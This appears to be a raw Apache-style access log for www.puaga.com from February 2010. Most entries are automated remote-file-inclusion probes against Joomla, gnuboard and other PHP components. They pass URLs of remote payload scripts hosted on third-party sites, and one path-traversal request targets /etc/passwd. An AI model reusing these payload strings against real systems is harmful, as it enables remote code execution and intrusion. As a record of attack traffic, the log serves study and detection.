77.240.113.151 - - [15/Feb/2010:04:34:00 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:04:34:01 -0800] "GET /logs/access_100120.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:34:45 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:34:45 -0800] "GET /logs/access_100123.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:34:51 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:34:51 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:34:51 -0800] "GET /logs/access_100203.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:34:56 -0800] "GET /logs/access_100120.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:35:08 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:35:08 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:35:08 -0800] "GET /logs/access_100123.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:35:25 -0800] "GET /logs/access_100130.log/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:35:37 -0800] "GET /logs/access_100125.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:35:44 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:35:56 -0800] "GET /logs/access_100111.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:35:56 -0800] "GET /logs/access_100119.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:04:35:56 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:35:59 -0800] "GET /logs/access_100107.log/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:04:36:01 -0800] "GET /logs/access_100130.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:04:36:01 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:04:36:01 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [15/Feb/2010:04:36:02 -0800] "GET /logs/access_100125.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:04:36:06 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:36:06 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [15/Feb/2010:04:36:14 -0800] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:04:36:30 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:04:36:30 -0800] "GET /logs/index.php?stranica=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:04:36:31 -0800] "GET /index.php?stranica=http://ebaroque.co.kr/page/1??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:04:36:42 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:04:36:42 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:04:36:42 -0800] "GET /delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:04:36:43 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:04:36:43 -0800] "GET /delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:04:36:45 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [15/Feb/2010:04:36:51 -0800] "GET /logs/access_100128.log%20%20/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:37:03 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:37:03 -0800] "GET /logs//administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:37:06 -0800] "GET /logs/access_100105.log%20%20//administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:38:05 -0800] "GET /logs/access_100126.log%20%20//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:38:09 -0800] "GET /logs/access_100130.log/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:04:38:14 -0800] "GET /logs/access_100119.log/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [15/Feb/2010:04:39:03 -0800] "GET /logs/?N=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:39:12 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:39:12 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:39:12 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:39:17 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:40:07 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:40:07 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:40:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:40:07 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:41:39 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:41:39 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:41:39 -0800] "GET /logs/access_100207.log%20%20//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:41:43 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:41:43 -0800] "GET /logs/access_100207.log%20%20//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:04:41:43 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [15/Feb/2010:04:42:15 -0800] "GET /pictures/ HTTP/1.0" 200 7797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [15/Feb/2010:04:42:16 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/pictures/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [15/Feb/2010:04:42:17 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/pictures/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
213.239.230.130 - - [15/Feb/2010:04:42:21 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:04:42:21 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:43:34 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:43:34 -0800] "GET /errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:43:34 -0800] "GET /logs/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:43:39 -0800] "GET /logs/access_100107.log/mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:43:39 -0800] "GET /logs/mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:43:39 -0800] "GET /mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:43:46 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:43:48 -0800] "GET /logs/access_100107.log/mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [15/Feb/2010:04:43:48 -0800] "GET /logs/access_100215.log HTTP/1.0" 200 1725574 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:43:52 -0800] "GET /mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:43:53 -0800] "GET /logs/mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:44:34 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:44:40 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:45:24 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:45:24 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:45:24 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:31 -0800] "GET /logs/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:31 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:32 -0800] "GET /errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:45:36 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:44 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:45 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:45 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:45 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:49 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:49 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:49 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:45:56 -0800] "GET /logs/access_100130.log/mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:45:59 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:46:01 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:04:46:07 -0800] "GET /logs/access_100130.log/mcf.php?content=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:46:50 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:04:46:56 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:47:56 -0800] "GET /logs/access_100202.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:48:45 -0800] "GET /mcf.php?content=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:48:45 -0800] "GET /logs/mcf.php?content=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:48:45 -0800] "GET /logs/access_100107.log/mcf.php?content=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:48:52 -0800] "GET /logs/access_100202.log//gnuboard4//bbs/delete_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:48:52 -0800] "GET /gnuboard4//bbs/delete_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:48:52 -0800] "GET /logs/access_100129.log//gnuboard4//bbs/delete_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:04:48:52 -0800] "GET /logs//gnuboard4//bbs/delete_update.php?board.skin.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:48:53 -0800] "GET /logs/access_100205.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:48:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:48:56 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:19 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:19 -0800] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:19 -0800] "GET /logs/access_100112.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:21 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:21 -0800] "GET /logs/access_100112.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:21 -0800] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:26 -0800] "GET /logs/access_100112.log%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:26 -0800] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:26 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:04:49:28 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
